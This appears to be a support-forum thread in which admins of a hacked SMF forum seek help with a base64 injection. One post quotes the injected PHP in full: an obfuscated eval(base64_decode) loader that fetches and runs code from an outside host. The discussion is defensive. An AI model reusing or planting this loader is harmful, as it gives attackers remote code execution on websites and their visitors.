SMF Support > SMF 2.0.x Support

base64 hack

(1/4) > >>

Krash.:

One of my guys has been hacked twice in the past month.  Base64 code in all index.php and some of the /Sources files.  Odd thing about it, when I tried to delete the entire forum, /forums/Themes/default/fonts/Screenge.ttf would not delete.  Filezilla was telling me file was in use, and could not delete or rename any of the subdirs above it.  Permissions of all files were blank in FZ, and showed as 'xxx' when checking individual files - that appeared to be server problem.  Was able to reset permissions to 755 and delete the file.  Same thing happened a month ago.

Has anyone else seen this?

Lout:
Similar thing regarding base64 reported here - http://www.simplemachines.org/community/index.php?topic=480455.0

You might want to contact the thread creator to compare notes.

busterone:
Yea, he had only one that I know of, but it was also in the index.php in the /Themes folder.  He hasn't posted back yet on the results of checking all his files, so there could be more on his as well.

JBlaze:
Would there happen to be a wordpress installation on the same server? Is it shared hosting? There are a few exploits out there for non-updated versions of WordPress that could cause this.

http://www.dotblag.com/2012/03/12/wordpress-blog-infections/
http://secunia.com/advisories/49327/

Krash.:
The account is running on GoDaddy, and there's no Wordpress install, just a website running above the forum.  We're seeing this in all index.php files and some /Sources/ files -


--- Code: ---
<?php /*68066*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKJHozNz0ic3RhdHMiOwokdWEzPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsKJHUzNyA9IGFycmF5KCJHb29nbGUiLCAiU2x1cnAiLCAiTVNOQm90IiwgImlhX2FyY2hpdmVyIiwgIllhbmRleCIsICJSYW1ibGVyIiwgIk1hYyIsICJpbnV4IiwgIlgxMSIpOwppZigocHJlZ19tYXRjaCgiLyIgLiBpbXBsb2RlKCJ8IiwgJHUzNykgLiAiL2kiLCAkdWEzKSkgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX1JFRkVSRVIiXSkgPT0wKSAgb3IgKGlzc2V0KCRfU0VSVkVSWyJIVFRQX0NPT0tJRSJdKSkgIG9yIChpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pID09MCkgKQp7fQplbHNlCnsKQHNldGNvb2tpZSgkejM3LG1kNSgic3RhdHMiKSx0aW1lKCkrMTcyODAwKTsKJHVybCA9ICJodHRwOi8vNDA0MGVudC5jb20vc2Vzc2lvbi5waHA/aWQiOwokaWZyYW1lPUBldmFsKGZpbGVfZ2V0X2NvbnRlbnRzICgkdXJsKSk7CmlmICgkaWZyYW1lKSBlY2hvKCRpZnJhbWUpOyAKfQoK'));/*68066*/ ?><?php

// Try to handle it with the upper level index.php. (it should know what to do.)
if (file_exists(dirname(dirname(__FILE__)) . '/index.php'))
include (dirname(dirname(__FILE__)) . '/index.php');
else
exit;

?>


--- End code ---

Something's happening with Screenge.ttf - it's a legit .ttf file, but when the forum is hacked., it doesn't allow itself to be deleted, and shows as a running process in FZ.  Same thing twice now, a month apart.  I'm a little creeped out about d/ling the file to my computer and looking in it. 

Navigation

[0] Message Index

[#] Next page